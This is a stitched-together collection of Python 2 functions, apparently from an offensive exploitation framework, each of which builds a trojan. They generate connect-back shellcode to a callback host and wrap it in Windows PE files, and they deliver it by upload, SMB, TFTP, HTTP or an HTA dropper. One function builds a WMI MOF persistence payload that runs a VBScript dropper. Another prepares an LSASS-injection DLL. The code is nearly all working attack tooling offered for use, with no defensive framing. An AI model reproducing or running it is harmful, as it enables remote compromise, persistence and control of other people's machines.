def get_trojan(self): trojan = '' try: sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': 0}) sc.addAttr('revert_to_self_before_importing_ws2_32', None) sc.addAttr('tcpconnect', { 'port': self.callback_port, 'ipaddress': self.callback_ip }) mosdef_type = self.engine.getMosdefType( canvasengine.WIN32MOSDEF_INTEL) mosdef_id = self.engine.getNewMosdefID(self) sc.addAttr("send_universal", { "mosdef_type": mosdef_type, "mosdef_id": mosdef_id }) sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'}) sc.addAttr("ExitThread", None) sc.vAllocSelf = True #we need to move to another page! myPElib = pelib.PElib() trojan = myPElib.createPEFileBuf(sc.get()) except: import traceback traceback.print_exc(file=sys.stderr) return trojan
def maketrojan(self): host = self.callback.ip port = self.callback.port sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0x1000}) if self.useSSL: ssl = "s" else: ssl = "" sc.addAttr("httpGetShellcode", {"URL": "http%s://%s:%d/w" % (ssl, host, port)}) shellcode = sc.get() myPElib = pelib.PElib() self.mosdeftrojan = myPElib.createPEFileBuf(shellcode) self.log("Writing out %d bytes to %s" % (len(self.mosdeftrojan), self.trojanname)) self.htafile = self.file4hta(self.mosdeftrojan) file(self.trojanname, "wb").write(self.htafile) self.setInfo("%s - done" % (NAME)) ret = len(self.mosdeftrojan) != 0 return ret
def init_trojan(self): """ Build + upload the trojan """ trojan = '' try: myPElib = pelib.PElib() trojan = myPElib.createPEFileBuf(self.shellcode) # write out the binary src = os.path.join(self.local_path, self.trojan_name) self.log('WP> Creating trojan in %s' % src) fd = open(src, 'wb') fd.write(trojan) fd.close() # upload the binary self.log('WP> Uploading trojan ...') dst = os.path.join(self.remote_path, self.trojan_name) ret = self.node.shell.upload(src, destfilename=dst) self.log('WP> %s' % ret) os.unlink(src) except: import traceback traceback.print_exc(file=sys.stderr) return False return True
def maketrojan(self): shellcode = self.createInjectToSelf(self.callback.ip, self.callback.port) myPElib = pelib.PElib() troj = myPElib.createPEFileBuf(shellcode) self.log('[D2] Writing out %d bytes to %s' % (len(troj), self.srcbin)) file(self.srcbin, "wb").write(troj)
def run(self): self.getargs() self.setInfo("%s (in progress)" % (NAME)) #check to make sure we have a proxyaddr argument if not self.proxyaddr: self.log("Cannot continue without a proxy address") self.setInfo("%s failed without PROXYADDR argument" % NAME) return 0 #check to make sure we have a domain argument if not self.domain: self.log("Cannot continue without a domain name") self.setInfo("%s failed without DOMAIN argument" % NAME) return 0 p = payloads.payloads() sc = p.dns_proxy("CNNN.NN.%s.%s" % ('dummy', self.domain), self.proxyaddr) #sc = p.httpcachedownload( self.url ) sc = p.assemble(sc) myPElib = pelib.PElib() exe = myPElib.createPEFileBuf(sc, gui=True) afile = file(self.filename, 'wb+') afile.write(exe) afile.close() self.log("File written to %s of %d bytes"%(self.filename, len(exe))) self.setInfo("%s Wrote %s callback to %s - done" % (NAME, self.proxyaddr, self.filename)) return len(sc) != 0
def makefile(self): myPElib = pelib.PElib() try: self.mosdeftrojan=myPElib.createPEFileBuf(self.shellcode) except Exception, err: self.log("WP> Problem building MOSDEF PE Trojan: %s"%(err)) self.setInfo("WP> %s attacking %s:%d - completed (failed!)"%(NAME,self.host,self.port)) return 0
def buildTrojan(self, type="Linux", arch="X86"): "build a MOSDEF based trojan binary" mosdeftrojan = "" if type in ["Linux", "Solaris"]: from MOSDEF import makeexe from MOSDEF.cc import threadsafe_cc_main self.log("[!] Compiling Unix trojan") infilename = "backdoors/cback_mmap_rwx.c" vars = {} vars['CBACK_PORT'] = self.callback.port vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip)) self.log("[!] Callback address is %s" % vars['CBACK_ADDR']) cc_command = [] for var in vars: cc_command += ["-D", "%s=%s" % (var, vars[var])] cc_command += ["-v", "-m", type, "-p", arch, infilename] self.log("[!] CC command: %s" % cc_command) mosdeftrojan = threadsafe_cc_main(cc_command) if not mosdeftrojan: self.log("[X] Was unable to create trojan!") return "" self.log("[!] Length of CC compiled trojan: %s" % len(mosdeftrojan)) elif type in ["Windows"]: from MOSDEF import pelib from shellcode import shellcodeGenerator sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", { "port": self.callback.port, "ipaddress": self.callback.ip }) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread", None) shellcode = sc.get() myPElib = pelib.PElib() mosdeftrojan = myPElib.createPEFileBuf(shellcode) if mosdeftrojan == None: self.log("Some sort of error compiling our PE") return "" self.log("[!] Win32 MOSDEF Trojan compiled to %d bytes" % len(mosdeftrojan)) return mosdeftrojan
def init_callback(self): """ Build + upload the MOSDEF callback trojan. On x64 capabable systems we use the x64 callback. """ if not self.callback: self.log('[-] No callback set!') return False trojan = '' try: sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': 0}) sc.addAttr('revert_to_self_before_importing_ws2_32', None) sc.addAttr('tcpconnect', { 'port': self.callback.port, 'ipaddress': self.callback.ip }) mosdef_type = self.engine.getMosdefType( canvasengine.WIN32MOSDEF_INTEL) mosdef_id = self.engine.getNewMosdefID(self) sc.addAttr("send_universal", { "mosdef_type": mosdef_type, "mosdef_id": mosdef_id }) sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'}) sc.addAttr("ExitThread", None) sc.vAllocSelf = True #we need to move to another page! callback_payload = sc.get() myPElib = pelib.PElib() trojan = myPElib.createPEFileBuf(callback_payload) # write out the binary src = os.path.join(self.local_path, self.trojan_name) self.log('[+] Creating callback trojan in %s' % src) fd = open(src, 'wb') fd.write(trojan) fd.close() # upload the binary self.log('[+] Uploading callback trojan ...') ret = self.node.shell.upload(src, destfilename=self.remote_path + self.trojan_name) self.log('[+] %s' % ret) except: import traceback traceback.print_exc(file=sys.stderr) return False return True
def set_up_smb_server(self): self.log("WP> Starting SMB Server on 0.0.0.0:445") mysmb = SMBServer('0.0.0.0', 445) mysmb.timeout = 30 # Use payload provided by calling module if it exists if self.argsDict.has_key("trojanPayload"): self.shellcode = self.argsDict.get("trojanPayload") self.log("WP> Building MOSDEF PE Trojan") myPElib = pelib.PElib() try: self.mosdeftrojan = myPElib.createPEFileBuf(self.shellcode) except Exception, err: self.log("WP> Problem building MOSDEF PE Trojan: %s" % (err)) self.setInfo("WP> %s attacking %s:%d - completed (failed!)" % (NAME, self.host, self.port)) return 0
class theexploit(tcpexploit, httpclientside): def __init__(self): tcpexploit.__init__(self) httpclientside.__init__(self) self.clientversion = 1 self.name = NAME self.trojanname = "index.php" self.filename = "index.html" return def maketrojan(self): proxy_payload = '' try: if hasattr(self, 'HTTPMOSDEF') and self.HTTPMOSDEF == True: # make sure that fromcreatethread is set to 0 in your # httpserver/exploit listenerArgsDict! import shellcode.standalone.windows.payloads as payloads ssl_dict = {True: 'https', False: 'http'} print "XXX: self.useSSL ..." + str(self.useSSL) p = payloads.payloads() sc = p.http_proxy( "%s://%s" % (ssl_dict[self.useSSL], self.callback.ip), self.callback.port) proxy_payload = p.assemble(sc) except Exception, msg: import traceback traceback.print_exc(file=sys.stderr) proxy_payload = '' myPElib = pelib.PElib() self.mosdeftrojan = myPElib.createPEFileBuf(proxy_payload) self.log("Writing out %d bytes to %s" % (len(self.mosdeftrojan), self.trojanname)) file(self.trojanname, "wb").write(self.mosdeftrojan) self.setInfo("%s - done" % (NAME)) ret = len(self.mosdeftrojan) != 0 return ret
def set_up_tftp_server(self): """ Returns False if could not set up the TFTPD server, otherwise, returns the TFTPD object """ self.log("building the MOSDEF trojan") shellcode = self.createShellcode() #use pelib to build the universal callback shellcode into a trojan .exe from MOSDEF import pelib pe = pelib.PElib() self.mosdeftrojan = pe.createPEFileBuf(shellcode) self.log("Starting up tftp server") try: myServer = TftpServer(allfiles=self.mosdeftrojan) myServer.listen() except Exception, msg: self.log("Failed to set up TFTPD: %s" % msg) return False
def run(self): self.getargs() self.setInfo("%s (in progress)" % (NAME)) #check to make sure we have a url argument if not self.url: self.log("Cannot continue without a URL argument") self.setInfo("%s failed without URL argument"%NAME) return 0 p = payloads.payloads() sc = p.httpcachedownload( self.url ) sc = p.assemble(sc) myPElib = pelib.PElib() exe = myPElib.createPEFileBuf(sc, gui=True) afile = file(self.filename, 'wb+') afile.write(exe) afile.close() self.log("File written to %s of %d bytes"%(self.filename, len(exe))) self.setInfo("%s Wrote %s callback to %s - done" % (NAME,self.url, self.filename)) return len(sc) != 0
class theexploit(tcpexploit,httpclientside): def __init__(self): tcpexploit.__init__(self) httpclientside.__init__(self) self.clientversion = 1 self.name = NAME self.trojanname = "index.hta" self.filename = "index.html" self.batch = "file.txt" self.url_num = 0 return def file4hta(self, exename): evilprog = "explorer.exe" e = [] for a in exename: for b in a: if b == "\r": d = "0d" elif b == "\n": d = "0a" elif b == "\0": d = "00" else: c = hex(ord(b)) d = c.replace("0x", "") if len(d) == 1: d = "0"+d e.append(d) i = 0 j = 0 l = len(e) hta = "<SCRIPT language=vbs>\n\n" while 1: hta += " prog = prog & \"" while i != 24: hta += "%s," % e[j] if j == l-1: break i += 1 j += 1 if j == l-1: hta = hta[:-1] + "\"\n\n" break hta += "\"\n" i = 0 hta += " tmp = Split(prog, \",\")\n" hta += " Set fso = CreateObject(\"Scripting.FileSystemObject\")\n" hta += " Set shell = CreateObject(\"WScript.Shell\")\n" hta += " userprofile = shell.ExpandEnvironmentStrings(\"%USERPROFILE%\")\n" hta += " path = userprofile & \"\\\" & \"%s\"\n" % evilprog hta += " Set f = fso.CreateTextFile(path, True)\n\n" hta += " For i = 0 To UBound(tmp)\n" hta += " prog = Int(\"&H\" & tmp(i))\n" hta += " f.Write Chr(prog)\n" hta += " Next\n\n" hta += " f.Close\n" hta += " shell.Run Chr(34) & path & Chr(34), 7, false\n" hta += " self.Close\n" hta += "</SCRIPT>\n" return hta def maketrojan(self): proxy_payload = '' try: if hasattr(self, 'HTTPMOSDEF') and self.HTTPMOSDEF == True: # make sure that fromcreatethread is set to 0 in your # httpserver/exploit listenerArgsDict! import shellcode.standalone.windows.payloads as payloads ssl_dict = { True : 'https', False : 'http' } print "XXX: self.useSSL ..." + str(self.useSSL) p = payloads.payloads() sc = p.http_proxy("%s://%s" % (ssl_dict[self.useSSL], self.callback.ip), self.callback.port) proxy_payload = p.assemble(sc) except Exception,msg: import traceback traceback.print_exc(file=sys.stderr) proxy_payload = '' myPElib = pelib.PElib() self.mosdeftrojan = myPElib.createPEFileBuf(proxy_payload) self.log("Writing out %d bytes to %s" % (len(self.mosdeftrojan), self.trojanname)) self.htafile = self.file4hta(self.mosdeftrojan) file(self.trojanname, "wb").write(self.htafile) self.setInfo("%s - done" % (NAME)) ret = len(self.mosdeftrojan) != 0 return ret
def vm_prepare_executables(self, tmp_directory): if self.is_64bit_node() and (not self.is_win10_node()): logging.info( "VM exploit not capable of running on pre-10 Windows versions") return None c_string_padding = "A" * 300 exploit_name = "%s.exe" % random.randint(1001, 2000) exploit_local_path = os.path.join(self.local_res, "tmp_%s" % exploit_name) exploit_rem_path = tmp_directory + exploit_name mosdef_dll_name = "%s.dll" % random.randint(2001, 3000) mosdef_local_path = os.path.join(self.local_res, "tmp_%s" % mosdef_dll_name) mosdef_rem_path = tmp_directory + mosdef_dll_name return_value = [(exploit_local_path, exploit_rem_path), (mosdef_local_path, mosdef_rem_path)] exploit_orig_name = "vm_exploit32.exe" if self.is_64bit_node() or self.has_wow64(): exploit_orig_name = "vm_exploit64.exe" shellcode = None mosdeftrojan = None if self.is_64bit_node() or self.has_wow64(): pld = payloads64(module=self, dll=True) shellcode_asm = pld.InjectToSelf(self.callback.ip, self.callback.port) shellcode = pld.assemble(shellcode_asm) myPElib = pelib.PElib(win64=1) mosdeftrojan = myPElib.createPEFileBuf({'DllMain': shellcode}, gui=True) else: pld = payloads(module=self, dll=True) shellcode_asm = pld.injectintoprocess(self.callback.ip, self.callback.port, load_winsock=True, SeDebugPrivilege=True, waitcode=False, exit_thread=True, universal=True, dll_create_thread=False) shellcode = pld.assemble(shellcode_asm) myPElib = pelib.PElib() importante = myPElib.get_random_imports() mosdeftrojan = myPElib.createPEFileBuf({'DllMain': shellcode}, gui=True, importante=importante) if mosdeftrojan == None: logging.error("Error while building our PE") return None else: logging.info("Writing MOSDEF LSASS inject trojan to %s" % mosdef_local_path) with open(mosdef_local_path, "wb") as handle: handle.write(mosdeftrojan) exploit_data = None with open(os.path.join(self.local_res, exploit_orig_name), "rb") as handle: exploit_data = handle.read() exploit_data = self.replace_c_string( exploit_data, "MOSDEF_SHIM_DLL_PATH" + c_string_padding, mosdef_rem_path) logging.info("Writing exploit to %s" % exploit_local_path) with open(exploit_local_path, "wb") as handle: handle.write(exploit_data) return return_value
def generateMOF(self): sc=shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval':0}) sc.addAttr('revert_to_self_before_importing_ws2_32', None) sc.addAttr('tcpconnect', {'port': self.callback.port, 'ipaddress':self.callback.ip}) mosdef_type=self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL) mosdef_id=self.engine.getNewMosdefID(self) self.log("Creating MOSDEF ID: %d"%mosdef_id) sc.addAttr('send_universal',{'mosdef_type': mosdef_type,'mosdef_id':mosdef_id}) sc.addAttr('RecvExecDepSafe',{'socketreg':'FDSPOT'}) sc.addAttr('ExitProcess',None) sc.vAllocSelf=True callback_payload=sc.get() myPElib=pelib.PElib() binary=myPElib.createPEFileBuf(callback_payload) vbs='' for i in range(0,len(binary),8): vbs+='"binary = binary & \\"' for j in range(8): if (i+j)>=len(binary): break vbs+='%02x'%(ord(binary[i+j])) if (i+j)!=len(binary)-1: vbs+=',' vbs+='\\"\\n"\n' vbs+='"tmp = Split(binary, \\",\\")\\n"\n' vbs+='"Set fso = CreateObject(\\"Scripting.FileSystemObject\\")\\n"\n' vbs+='"Set shell = CreateObject(\\"WScript.Shell\\")\\n"\n' vbs+='"userprofile = shell.ExpandEnvironmentStrings(\\"%USERPROFILE%\\")\\n"\n' vbs+='"path = userprofile & \\"\\\\\\" & \\"cb%d.exe\\"\\n"\n'%(random.randint(1,99)) vbs+='"Set f = fso.CreateTextFile(path, True)\\n"\n' vbs+='"For i = 0 To UBound(tmp)\\n"\n' vbs+='" b = Int(\\"&H\\" & tmp(i))\\n"\n' vbs+='" f.Write Chr(b)\\n"\n' vbs+='"Next\\n"\n' vbs+='"f.Close\\n"\n' vbs+='"shell.Run Chr(34) & path & Chr(34), 7, false\\n"' mof="""#pragma namespace ("\\\\\\\\.\\\\root\\\\subscription") #pragma deleteclass("MyASEventConsumer", nofail) #pragma deleteinstance("__EventFilter.Name=\\\"EF\\\"", nofail) #pragma deleteinstance("ActiveScriptEventConsumer.Name=\\\"ASEC\\\"", nofail) class MyASEventConsumer { [key]string Name; }; instance of ActiveScriptEventConsumer as $CONSUMER { CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0}; Name = "ASEC"; ScriptingEngine = "VBScript"; ScriptText = SCRIPT; }; instance of __EventFilter as $FILTER { CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0}; Name = "EF"; Query = "SELECT * FROM __InstanceCreationEvent" " WHERE TargetInstance.__class = \\"MyASEventConsumer\\""; QueryLanguage = "WQL"; }; instance of __FilterToConsumerBinding as $BINDING { CreatorSID = {1,2,0,0,0,0,0,5,32,0,0,0,32,2,0,0}; Filter = $FILTER; Consumer = $CONSUMER; }; instance of MyASEventConsumer { Name = "Trigger"; }; """.replace('SCRIPT',vbs) #print mof return mof